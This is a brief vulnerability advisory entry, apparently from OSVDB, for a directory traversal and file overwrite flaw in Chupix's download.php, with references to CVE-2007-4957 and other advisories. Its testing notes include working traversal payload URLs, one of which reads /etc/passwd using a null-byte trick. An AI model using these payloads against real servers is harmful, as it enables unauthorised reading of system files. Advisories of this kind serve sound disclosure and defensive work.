Chupix download.php Multiple Variable Traversal Arbitrary File Overwrite

2007-09-15T00:00:00
ID OSVDB:38881
Type osvdb
Reporter OSVDB
Modified 2007-09-15T00:00:00

Description

Manual Testing Notes

/download.php?repertoire=defaut&fichier=../../download.php /download.php?fichier=../../../../../../../etc/passwd%00

References:

Secunia Advisory ID:26851 Related OSVDB ID: 38882 Related OSVDB ID: 38883 Other Advisory URL: http://milw0rm.com/exploits/4411 ISS X-Force ID: 36641 FrSIRT Advisory: ADV-2007-3180 CVE-2007-4957 Bugtraq ID: 25681